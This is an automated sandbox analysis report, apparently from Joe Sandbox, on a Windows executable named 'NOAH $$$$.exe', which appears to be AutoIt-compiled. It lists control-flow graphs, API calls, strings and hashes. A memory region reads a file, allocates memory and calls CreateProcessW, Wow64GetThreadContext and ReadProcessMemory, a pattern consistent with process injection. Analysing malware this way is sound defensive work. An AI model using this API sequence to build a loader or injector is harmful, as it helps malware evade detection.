                                                                                                                                        control_flow_graph 2065 3fcc708-3fcc7b6 call 3fca0f8 2068 3fcc7bd-3fcc7e3 call 3fcd618 CreateFileW 2065->2068 2071 3fcc7ea-3fcc7fa 2068->2071 2072 3fcc7e5 2068->2072 2080 3fcc7fc 2071->2080 2081 3fcc801-3fcc81b VirtualAlloc 2071->2081 2073 3fcc935-3fcc939 2072->2073 2074 3fcc97b-3fcc97e 2073->2074 2075 3fcc93b-3fcc93f 2073->2075 2077 3fcc981-3fcc988 2074->2077 2078 3fcc94b-3fcc94f 2075->2078 2079 3fcc941-3fcc944 2075->2079 2082 3fcc9dd-3fcc9f2 2077->2082 2083 3fcc98a-3fcc995 2077->2083 2084 3fcc95f-3fcc963 2078->2084 2085 3fcc951-3fcc95b 2078->2085 2079->2078 2080->2073 2086 3fcc81d 2081->2086 2087 3fcc822-3fcc839 ReadFile 2081->2087 2090 3fcc9f4-3fcc9ff VirtualFree 2082->2090 2091 3fcca02-3fcca0a 2082->2091 2088 3fcc999-3fcc9a5 2083->2088 2089 3fcc997 2083->2089 2092 3fcc965-3fcc96f 2084->2092 2093 3fcc973 2084->2093 2085->2084 2086->2073 2094 3fcc83b 2087->2094 2095 3fcc840-3fcc880 VirtualAlloc 2087->2095 2098 3fcc9b9-3fcc9c5 2088->2098 2099 3fcc9a7-3fcc9b7 2088->2099 2089->2082 2090->2091 2092->2093 2093->2074 2094->2073 2096 3fcc887-3fcc8a2 call 3fcd868 2095->2096 2097 3fcc882 2095->2097 2105 3fcc8ad-3fcc8b7 2096->2105 2097->2073 2102 3fcc9c7-3fcc9d0 2098->2102 2103 3fcc9d2-3fcc9d8 2098->2103 2101 3fcc9db 2099->2101 2101->2077 2102->2101 2103->2101 2106 3fcc8b9-3fcc8e8 call 3fcd868 2105->2106 2107 3fcc8ea-3fcc8fe call 3fcd678 2105->2107 2106->2105 2113 3fcc900 2107->2113 2114 3fcc902-3fcc906 2107->2114 2113->2073 2115 3fcc908-3fcc90c CloseHandle 2114->2115 2116 3fcc912-3fcc916 2114->2116 2115->2116 2117 3fcc918-3fcc923 VirtualFree 2116->2117 2118 3fcc926-3fcc92f 2116->2118 2117->2118 2118->2068 2118->2073
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03FCC7D9
                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03FCC9FF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2031663945.0000000003FCA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FCA000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3fca000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFileFreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 204039940-0
                                                                                                                                        • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                                        • Instruction ID: 4c7d335b67f907d4662f20f44680883c43449e675b236c73efa02cf514806143
                                                                                                                                        • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                                        • Instruction Fuzzy Hash: 4AA11875E5024AEBDB14CFA4CA94BEEFBB5BF48304F24819DE105BB280D7759A41CB50

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2119 4102b0-4102c5 SHGetMalloc 2120 4102cb-4102da SHGetDesktopFolder 2119->2120 2121 425dfd-425e0e call 433244 2119->2121 2122 4102e0-41031a call 412fba 2120->2122 2123 41036b-410379 2120->2123 2131 410360-410368 2122->2131 2132 41031c-410331 SHGetPathFromIDListW 2122->2132 2123->2121 2129 41037f-410384 2123->2129 2131->2123 2133 410351-41035d 2132->2133 2134 410333-41034a call 412fba 2132->2134 2133->2131 2134->2133
                                                                                                                                        APIs
                                                                                                                                        • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                        • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                        • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                        • _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                                                        • String ID: C:\Users\user\Desktop\NOAH $$$$.exe
                                                                                                                                        • API String ID: 3170942423-3935457212
                                                                                                                                        • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                        • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                                                        • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                        • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2137 401250-40125c 2138 401262-401293 call 412f40 call 401b80 2137->2138 2139 4012e8-4012ed 2137->2139 2144 4012d1-4012e2 KillTimer SetTimer 2138->2144 2145 401295-4012b5 2138->2145 2144->2139 2146 4012bb-4012bf 2145->2146 2147 4272ec-4272f2 2145->2147 2148 4012c5-4012cb 2146->2148 2149 42733f-427346 2146->2149 2150 4272f4-427315 Shell_NotifyIconW 2147->2150 2151 42731a-42733a Shell_NotifyIconW 2147->2151 2148->2144 2152 427393-4273b4 Shell_NotifyIconW 2148->2152 2153 427348-427369 Shell_NotifyIconW 2149->2153 2154 42736e-42738e Shell_NotifyIconW 2149->2154 2150->2144 2151->2144 2152->2144 2153->2144 2154->2144
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                          • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                          • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                        • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                                                        • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3300667738-0
                                                                                                                                        • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                                                        • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                                                        • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                                                        • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2155 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2158 427190-4271ae RegQueryValueExW 2155->2158 2159 40e4eb-40e4f0 2155->2159 2160 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2158->2160 2161 42721a-42722a RegCloseKey 2158->2161 2166 427210-427219 call 436508 2160->2166 2167 4271f7-42720e call 402160 2160->2167 2166->2161 2167->2166
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                        • API String ID: 1586453840-614718249
                                                                                                                                        • Opcode ID: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                                                                                                                                        • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                                                        • Opcode Fuzzy Hash: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                                                                                                                                        • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CreateShow
                                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                                        • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                        • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                                                        • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                        • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 03FCC398: Sleep.KERNELBASE(000001F4), ref: 03FCC3A9
                                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03FCC5FD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2031663945.0000000003FCA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FCA000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3fca000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFileSleep
                                                                                                                                        • String ID: S6W690U8SLTXJX6KR71V821MAEB7C
                                                                                                                                        • API String ID: 2694422964-4179694169
                                                                                                                                        • Opcode ID: 9ca17677844319a226ff26579c914b26daae5ccba64f0646703615e5ef7bb7d7
                                                                                                                                        • Instruction ID: 34762618a73fbac7d0a9f8b798b9fab5bfcad5c42ff73cbadd7bb847909676ba
                                                                                                                                        • Opcode Fuzzy Hash: 9ca17677844319a226ff26579c914b26daae5ccba64f0646703615e5ef7bb7d7
                                                                                                                                        • Instruction Fuzzy Hash: 3261A230D18289DAEF11C7A4C944BEEBB79AF15304F04419DE5487B2C1D7BA0B49CB65
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$OpenQueryValue
                                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                                        • API String ID: 1607946009-824357125
                                                                                                                                        • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                        • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                                                        • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                        • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03FCBBC5
                                                                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FCBBE9
                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FCBC0B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2031663945.0000000003FCA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FCA000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3fca000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2438371351-0
                                                                                                                                        • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                                                                        • Instruction ID: 758c16a0c7e5c931083e6f1db8da6c9d2d39475dc016aab63d8003f687a733f4
                                                                                                                                        • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                                                                        • Instruction Fuzzy Hash: 8C623C34A642599BEB24CFA4C951BDEB372FF58300F1091A9D10DEB390E7799E80CB59
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                                                        • _free.LIBCMT ref: 004295A0
                                                                                                                                          • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                          • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                          • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                          • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                          • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                                                          • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\NOAH $$$$.exe
                                                                                                                                        • API String ID: 3938964917-2909434141
                                                                                                                                        • Opcode ID: fc8ad9049dc94ba5b93ccabce5efb04746d9842915e300131853224c507a20a4
                                                                                                                                        • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                                                        • Opcode Fuzzy Hash: fc8ad9049dc94ba5b93ccabce5efb04746d9842915e300131853224c507a20a4
                                                                                                                                        • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: Error:
                                                                                                                                        • API String ID: 4104443479-232661952
                                                                                                                                        • Opcode ID: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                                                                                                                                        • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                                                        • Opcode Fuzzy Hash: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                                                                                                                                        • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                                                        APIs
                                                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\NOAH $$$$.exe,0040F545,C:\Users\user\Desktop\NOAH $$$$.exe,004A90E8,C:\Users\user\Desktop\NOAH $$$$.exe,?,0040F545), ref: 0041013C
                                                                                                                                          • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                          • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                          • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                          • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                                                        • String ID: X$pWH
                                                                                                                                        • API String ID: 85490731-941433119
                                                                                                                                        • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                        • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                                                        • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                        • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                                                        APIs
                                                                                                                                        • _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                        • _memmove.LIBCMT ref: 00401B57
                                                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                                                        • String ID: @EXITCODE
